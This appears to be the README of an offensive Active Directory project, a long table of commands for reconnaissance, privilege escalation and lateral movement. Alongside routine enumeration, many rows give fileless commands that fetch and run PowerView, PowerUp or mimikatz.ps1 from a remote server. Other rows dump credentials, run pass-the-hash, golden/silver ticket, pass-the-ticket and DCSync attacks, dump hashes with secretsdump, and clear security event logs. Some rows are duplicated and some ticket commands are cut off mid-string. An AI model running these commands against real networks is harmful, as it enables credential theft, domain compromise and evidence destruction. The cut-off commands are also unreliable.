It is not only about Living off the Land attacks, for which public resources are scarce, but also a broad collection of commands and resources.
The LOLAD and Exploitation project provides a comprehensive collection of Active Directory techniques, commands, and functions that can be used natively to support offensive security operations and Red Team exercises. These techniques leverage AD’s built-in tools to conduct reconnaissance, privilege escalation, and lateral movement, among other tactics. Understanding these methods helps defenders strengthen AD configurations and improve monitoring capabilities.
For contributions and guidelines, please see the contribution guide.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can explore the ATT&CK® Navigator mapping of this project on the ATT&CK® Navigator.
The table below lists some common AD techniques along with commands and scripts for each. You can keep adding entries as needed.
Technique/Command Name | Command | Type | Reference |
---|---|---|---|
Collect Domain SID | `Get-ADDomain \| Select-Object SID` | PowerShell | Microsoft Documentation |
List Domain Controllers | `nltest /dclist:domain` | CMD | Microsoft Documentation |
Enumerate Domain Groups | `Get-ADGroup -Filter * \| Select-Object Name` | PowerShell | Microsoft Documentation |
Check AD Replication Status | `repadmin /replsummary` | CMD | Microsoft Documentation |
Enumerate Domain Users | `Get-ADUser -Filter * \| Select-Object Name, SamAccountName` | PowerShell | AD Exploitation Cheat Sheet |
Get Domain Password Policy | `Get-ADDefaultDomainPasswordPolicy` | PowerShell | PowerShell Red Team |
Identify Members of Domain Admins | `Get-ADGroupMember -Identity "Domain Admins"` | PowerShell | Microsoft Documentation |
Check Kerberos Ticket Policy | `Get-ADDefaultDomainPasswordPolicy \| Select-Object -ExpandProperty KerberosTicketPolicy` | PowerShell | AD Exploitation Cheat Sheet |
List All Organizational Units (OUs) | `Get-ADOrganizationalUnit -Filter *` | PowerShell | Microsoft Documentation |
Identify Users with Delegation Privileges | `Get-ADUser -Filter {TrustedForDelegation -eq $true}` | PowerShell | PowerShell Red Team |
List AD Users with Details | `Get-ADUser -Filter * -Properties DisplayName, EmailAddress, LastLogonDate` | PowerShell | Microsoft Documentation |
Identify Accounts with SPNs (Kerberoasting) | `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName` | PowerShell | AD Exploitation Cheat Sheet |
Find Admin Accounts | `dsquery user -name *admin*` | CMD | HackTricks - AD Methodology |
List all Domain Computers | `Get-ADComputer -Filter * -Properties OperatingSystem \| Select-Object Name, OperatingSystem` | PowerShell | Medium - AD Enumeration |
Check Group Policy Objects (GPOs) | `Get-GPO -All` | PowerShell | Active Directory Pro |
List Privileged Groups | `net group "Domain Admins" /domain` | CMD | HackTheBox - AD Pentesting Guide |
Find Machines with Unconstrained Delegation | `Get-ADComputer -Filter {TrustedForDelegation -eq $true}` | PowerShell | PowerShell Red Team |
Check User Account Lockout Status | `Get-ADUser -Filter * -Properties LockedOut \| Where-Object {$_.LockedOut -eq $true}` | PowerShell | Exploit-DB - AD Enumeration Guide |
Identify Expired Passwords | `Search-ADAccount -PasswordExpired \| Select-Object Name, PasswordExpired` | PowerShell | Pentest Everything - AD Enumeration |
Query all Domain Services | `nltest /dsgetdc:domain` | CMD | Medium - AD Enumeration with PowerShell |
Enumerate Trusted Domains | `nltest /trusted_domains` | CMD | GitHub - AD Pentest |
List AD Sites | `Get-ADReplicationSite -Filter *` | PowerShell | Microsoft Documentation |
Get Domain Forest Information | `Get-ADForest` | PowerShell | CBT Nuggets - Common AD Commands |
Find SID History for Users (SID History Abuse) | `Get-ADUser -Filter * -Properties SIDHistory \| Where-Object {$_.SIDHistory}` | PowerShell | AD Exploitation Cheat Sheet |
Check Domain Controller Certificates | `certutil -dcinfo verify` | CMD | PowerShell Red Team |
Import PowerView Module | `powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerView.ps1'); Get-NetUser"` | PowerShell | PowerSploit - PowerView |
Import PowerUp Module | `powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerUp.ps1'); Invoke-AllChecks"` | PowerShell | PowerSploit - PowerUp |
Find Domain Admins with PowerView | `Get-NetGroup -GroupName "Domain Admins" \| Get-NetGroupMember` | PowerShell (PowerView) | PowerSploit - PowerView |
List All Domains with PowerView | `Get-NetDomain` | PowerShell (PowerView) | HackTricks - AD Methodology |
Enumerate Domain Trusts with PowerView | `Get-NetDomainTrust` | PowerShell (PowerView) | Medium - AD Enumeration |
Find Local Privilege Escalation Paths with PowerUp | `Invoke-AllChecks` | PowerShell (PowerUp) | PowerSploit - PowerUp |
Identify Local Administrators with PowerUp | `Get-LocalGroupMember -Group "Administrators"` | PowerShell | PowerSploit - PowerUp |
Search for Kerberoastable Accounts with PowerView | `Get-NetUser -SPN \| Select-Object servicePrincipalName` | PowerShell (PowerView) | PowerSploit - PowerView |
List All Sessions on Domain Machines with PowerView | `Get-NetSession -ComputerName target-machine` | PowerShell (PowerView) | Pentest Everything - AD Enumeration |
Enumerate Local Admins on All Domain Machines with PowerView | `Invoke-EnumerateLocalAdmin -ComputerName target-machine` | PowerShell (PowerView) | PowerSploit - PowerView |
Find Weak File Permissions with PowerUp | `Invoke-CheckLocalAdminAccess` | PowerShell (PowerUp) | PowerSploit - PowerUp |
Check Writable Registry Paths with PowerUp | `Invoke-AllChecks \| Select-Object WritableRegPaths` | PowerShell (PowerUp) | PowerSploit - PowerUp |
Dump Domain Hashes with SecretsDump | `secretsdump.py domain/username:password@target` | Python (Impacket) | Impacket - SecretsDump |
Check Domain Policies with PowerView | `Get-DomainPolicy` | PowerShell (PowerView) | PowerSploit - PowerView |
Identify Interesting ACLs with PowerView | `Find-InterestingDomainAcl` | PowerShell (PowerView) | PowerSploit - PowerView |
Enumerate Domain Users (LDAP) | `dsquery user -name *` | CMD | Active Directory Pro |
Get Domain Information | `Get-ADDomain` | PowerShell | Microsoft Documentation |
Enumerate Domain Forest | `Get-ADForest` | PowerShell | Microsoft Documentation |
List All Users in the Domain | `net user /domain` | CMD | Active Directory Pro |
Get Domain Functional Level | `Get-ADDomain \| Select-Object DomainMode` | PowerShell | HackTricks - AD Methodology |
List Domain Groups | `Get-ADGroup -Filter * \| Select-Object Name` | PowerShell | Medium - AD Enumeration |
Query Domain Controllers in Domain | `nltest /dclist:domain` | CMD | Microsoft Documentation |
Find DC Site Information | `nltest /dsgetsite` | CMD | Microsoft Documentation |
List All Computers in Domain | `Get-ADComputer -Filter *` | PowerShell | Active Directory Pro |
Get All Subnets in the Forest | `Get-ADReplicationSubnet -Filter *` | PowerShell | Microsoft Documentation |
Check LDAP Server Status | `nltest /dsgetdc:domain /ldaponly` | CMD | Microsoft Documentation |
Get AD DNS Zone Information | `Get-DnsServerZone` | PowerShell | Microsoft Documentation |
Check Domain Group Membership | `net group "GroupName" /domain` | CMD | CBT Nuggets - AD Commands |
Get Domain Users Last Logon Time | `Get-ADUser -Filter * -Properties LastLogonDate \| Select Name, LastLogonDate` | PowerShell | Medium - AD Enumeration |
List all Service Accounts | `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName \| Select Name, ServicePrincipalName` | PowerShell | Pentest Everything - AD Enumeration |
Get Password Policy of Domain | `Get-ADDefaultDomainPasswordPolicy` | PowerShell | Active Directory Pro |
List Open File Shares on Domain Machines | `net view \\target-machine` | CMD | Exploit-DB - AD Enumeration |
Find Active Directory Sites | `Get-ADReplicationSite -Filter *` | PowerShell | Microsoft Documentation |
List Organizational Units (OUs) | `Get-ADOrganizationalUnit -Filter *` | PowerShell | Microsoft Documentation |
Check Group Policy for Computer | `gpresult /r /scope computer` | CMD | Microsoft Documentation |
Query DNS Servers in Domain | `Get-DnsServerResourceRecord -ZoneName "domain.local"` | PowerShell | Microsoft Documentation |
Enumerate Global Catalog Servers | `nltest /dsgetdc:domain /gc` | CMD | Microsoft Documentation |
Get Domain Password Expiration Policy | `net accounts /domain` | CMD | HackTheBox - AD Pentesting Guide |
Get Domain Controllers | `Get-ADDomainController -Filter *` | PowerShell | Microsoft Documentation |
Enumerate All Organizational Units (OUs) | `Get-ADOrganizationalUnit -Filter * \| Select-Object Name, DistinguishedName` | PowerShell | Microsoft Documentation |
List Users in Specific Group | `Get-ADGroupMember -Identity "Domain Admins" \| Select-Object Name, SamAccountName` | PowerShell | AD Exploitation Cheat Sheet |
Check Last Logon Time for All Users | `Get-ADUser -Filter * -Properties LastLogonDate \| Where-Object {$_.LastLogonDate -ne $null} \| Select-Object Name, LastLogonDate` | PowerShell | Active Directory Pro |
List Active Directory Sites | `Get-ADReplicationSite -Filter *` | PowerShell | Microsoft Documentation |
Find Local Administrators on a Machine | `net localgroup Administrators` | CMD | Microsoft Documentation |
Get Domain Users with Expired Passwords | `Search-ADAccount -PasswordExpired \| Select-Object Name, PasswordExpired` | PowerShell | HackTheBox - AD Pentesting Guide |
Query Domain Forest Global Catalog | `nltest /gc` | CMD | Microsoft Documentation |
Check Domain Admin Account Status | `Get-ADUser -Filter {MemberOf -RecursiveMatch "CN=Domain Admins,CN=Users,DC=domain,DC=com"} \| Select-Object Name, Enabled` | PowerShell | Pentest Everything - AD Enumeration |
List Privileged Accounts in Domain | `Get-ADUser -Filter {AdminCount -eq 1} \| Select-Object Name, SamAccountName` | PowerShell | Medium - AD Enumeration |
Enumerate Group Policy Objects (GPO) | `Get-GPO -All \| Select-Object DisplayName, GpoStatus` | PowerShell | PowerShell Red Team |
Identify Computers with Unconstrained Delegation | `Get-ADComputer -Filter {TrustedForDelegation -eq $true} \| Select-Object Name, DNSHostName` | PowerShell | PowerSploit - PowerView |
List All Domain Groups and Their Members | `Get-ADGroup -Filter * \| ForEach-Object {Get-ADGroupMember -Identity $_.Name \| Select Name, SamAccountName}` | PowerShell | AD Exploitation Cheat Sheet |
Find Domain Password Policy Settings | `net accounts /domain` | CMD | Active Directory Pro |
List Service Principal Names (SPNs) | `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName \| Select-Object Name, ServicePrincipalName` | PowerShell | HackTricks - AD Methodology |
Enumerate DNS Servers | `Get-DnsServer \| Select-Object Name, IPAddress` | PowerShell | Microsoft Documentation |
List Delegated Admins on Specific OU | `Get-ACL "AD:\OU=TestOU,DC=domain,DC=com" \| Format-List` | PowerShell | Medium - AD Enumeration |
Identify Expired Accounts | `Search-ADAccount -AccountExpired \| Select-Object Name, Enabled` | PowerShell | AD Exploitation Cheat Sheet |
Check Domain Controller Synchronization Status | `repadmin /showrepl` | CMD | Microsoft Documentation |
Find Computers with LAPS Enabled | `Find-AdmPwdExtendedRights -Identity "OU=Workstations,DC=domain,DC=com"` | PowerShell | Microsoft Documentation |
View All Replication Subnets | `Get-ADReplicationSubnet -Filter *` | PowerShell | Microsoft Documentation |
List Machines with High Privileges | `Get-ADComputer -Filter {PrimaryGroupID -eq 512}` | PowerShell | Medium - AD Enumeration |
Get AD Domain Sites and Subnets | `Get-ADReplicationSite \| Select-Object Name, SiteObjectGUID` | PowerShell | Microsoft Documentation |
Enumerate Password Policies | `Get-ADFineGrainedPasswordPolicy` | PowerShell | Microsoft Documentation |
Find High-Value Targets (e.g., Admins with SPN) | `Get-ADUser -Filter {ServicePrincipalName -ne "$null" -and MemberOf -RecursiveMatch "CN=Domain Admins,CN=Users,DC=domain,DC=com"} -Properties ServicePrincipalName \| Select Name, ServicePrincipalName` | PowerShell | AD Exploitation Cheat Sheet |
List All Domain Groups and Membership Counts | `Get-ADGroup -Filter * \| ForEach-Object {Write-Output "$($_.Name): $((Get-ADGroupMember -Identity $_.Name).Count)"}` | PowerShell | Active Directory Pro |
Find Sensitive Account Delegations | `Get-ADUser -Filter {TrustedForDelegation -eq $true} \| Select-Object Name, SamAccountName` | PowerShell | HackTricks - AD Methodology |
Enumerate Domain Admins | `Get-ADGroupMember -Identity "Domain Admins" \| Select Name, SamAccountName, ObjectClass` | PowerShell | AD Exploitation Cheat Sheet |
Check for Kerberos Pre-Authentication Disabled Accounts | `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} \| Select Name, SamAccountName` | PowerShell | Microsoft Documentation |
Find All Sessions on a Computer | `quser /server:ComputerName` | CMD | Quser Command |
Identify all GPO Permissions for a User | `Get-GPPermission -All -TargetName "UserName" -TargetType User \| Select-Object Trustee, Permission` | PowerShell | Microsoft Documentation |
Enumerate All Forest Trusts | `Get-ADTrust -Filter *` | PowerShell | Microsoft Documentation |
List Open Shares on Remote Computer | `net view \\ComputerName /all` | CMD | Net View Command |
Check if Machine is a Domain Controller | `if ((Get-ADComputer -Identity "ComputerName" -Properties PrimaryGroupID).PrimaryGroupID -eq 516) { "Domain Controller" }` | PowerShell | Microsoft Documentation |
List All Members of a Specific OU | `Get-ADUser -SearchBase "OU=Users,DC=domain,DC=com" -Filter * \| Select Name, SamAccountName` | PowerShell | Active Directory Pro |
Identify Admin Accounts with Password Never Expire | `Get-ADUser -Filter {PasswordNeverExpires -eq $true -and AdminCount -eq 1} \| Select-Object Name` | PowerShell | HackTricks - AD Methodology |
Get LAPS-Enabled Computers | `Find-AdmPwdExtendedRights -Identity "OU=Computers,DC=domain,DC=com"` | PowerShell (LAPS) | Microsoft Documentation |
Check Active Directory Replication Queue | `repadmin /queue` | CMD | Microsoft Documentation |
List All Kerberos Tickets in Cache | `klist` | CMD | Klist Command |
Find Users with Expired Passwords | `Search-ADAccount -PasswordExpired \| Select-Object Name, SamAccountName` | PowerShell | Microsoft Documentation |
List All Disabled Accounts in Domain | `Search-ADAccount -AccountDisabled \| Select-Object Name, SamAccountName` | PowerShell | Microsoft Documentation |
List Privileges for a Specific Group | `Get-ADGroupMember -Identity "Enterprise Admins" \| Select Name, SamAccountName` | PowerShell | Microsoft Documentation |
List Sessions on a Domain Controller | `qwinsta /server:DomainControllerName` | CMD | Qwinsta Command |
Check Domain Controllers Replication Status | `Get-ADReplicationPartnerMetadata -Target "DC=domain,DC=com"` | PowerShell | Microsoft Documentation |
List Local Administrators on Remote System | `net localgroup Administrators /domain` | CMD | Net Localgroup Command |
Run Mimikatz as Admin (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'` | PowerShell (Fileless) | Mimikatz Cheat Sheet |
Dump Credentials from Memory (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'` | PowerShell (Fileless) | Comprehensive Mimikatz Guide |
Extract Kerberos Ticket (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::list /export'` | PowerShell (Fileless) | ADSecurity - Mimikatz |
Pass-the-Hash Attack (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::pth /user:UserName /domain:domain.local /ntlm:hash /run:powershell.exe'` | PowerShell (Fileless) | AkimboCore - Mimikatz |
Enumerate All Registry Keys | `reg query HKLM` | CMD | SS64 - Reg Command |
Check AutoStart Programs | `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` | CMD | HackTricks - Registry Persistence |
Modify Registry Key Permissions | `reg add HKLM\Software\ExampleKey /v ExampleValue /t REG_SZ /d "ExampleData" /f` | CMD | SS64 - Reg Add Command |
Export Registry Hive | `reg export HKLM\Software\MyKey mykey.reg` | CMD | SS64 - Reg Export Command |
Force Group Policy Update | `gpupdate /force` | CMD | SS64 - Gpupdate Command |
List Applied GPOs for Computer | `gpresult /R /SCOPE COMPUTER` | CMD | SS64 - Gpresult Command |
Enumerate All GPOs Linked to OU | `Get-GPInheritance -Domain domain.local -Target "OU=ExampleOU,DC=domain,DC=local"` | PowerShell | Microsoft Documentation |
List All Group Policies in Domain | `Get-GPO -All` | PowerShell | Microsoft Documentation |
Find Local Admins on Remote Machine | `net localgroup Administrators /domain` | CMD | SS64 - Net Localgroup Command |
View Security Event Logs | `Get-EventLog -LogName Security -Newest 100` | PowerShell | Microsoft Documentation |
Clear Security Event Logs | `Clear-EventLog -LogName Security` | PowerShell | Microsoft Documentation |
Enable Remote Desktop (RDP) | `reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f` | CMD | HackTricks - Enable RDP |
Golden Ticket Attack (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-` Load the ticket in session: `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt` | PowerShell (Fileless) | HackTricks - Golden Ticket |
Silver Ticket Attack (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::golden /user:UserName /domain:domain.local /sid:S-1-5-21-` Load the ticket in session: `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt` | PowerShell (Fileless) | ADSecurity - Silver Ticket |
Pass-the-Ticket Attack (Fileless) | Dump Kerberos tickets in memory: `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::tickets'` Use a specific Kerberos ticket: `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt` | PowerShell (Fileless) | Mimikatz Cheat Sheet - Pass-the-Ticket |
Dump Cached Domain Credentials (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'` (Requires elevated privileges) | PowerShell (Fileless) | Comprehensive Mimikatz Guide |
Dump Domain Credentials using DCSync (Fileless) | `IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'lsadump::dcsync /domain:domain.local /user:Administrator'` | PowerShell (Fileless) | ADSecurity - DCSync Attack |
Check Registry Keys for Persistence | `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` | CMD | SS64 - Reg Command |
List User Rights Assignments | `Get-GPResultantSetOfPolicy -User domain\username -ReportType Html -Path C:\gporeport.html` | PowerShell | Microsoft Documentation |
Export All Group Policy Objects | `Backup-GPO -All -Path "C:\GPOBackups"` | PowerShell | Microsoft Documentation |
Pass-the-Hash Attack on Local Account | `sekurlsa::pth /user:LocalUser /domain:localhost /ntlm:` | Mimikatz | HackTricks - Pass-the-Hash |
Query Active Directory Replication Partners | `repadmin /showrepl` | CMD | Microsoft Documentation |
List All Active Directory Sites | `Get-ADReplicationSite -Filter *` | PowerShell | Microsoft Documentation |
Identify Domain Admins Group Members | `Get-ADGroupMember -Identity "Domain Admins"` | PowerShell | Microsoft Documentation |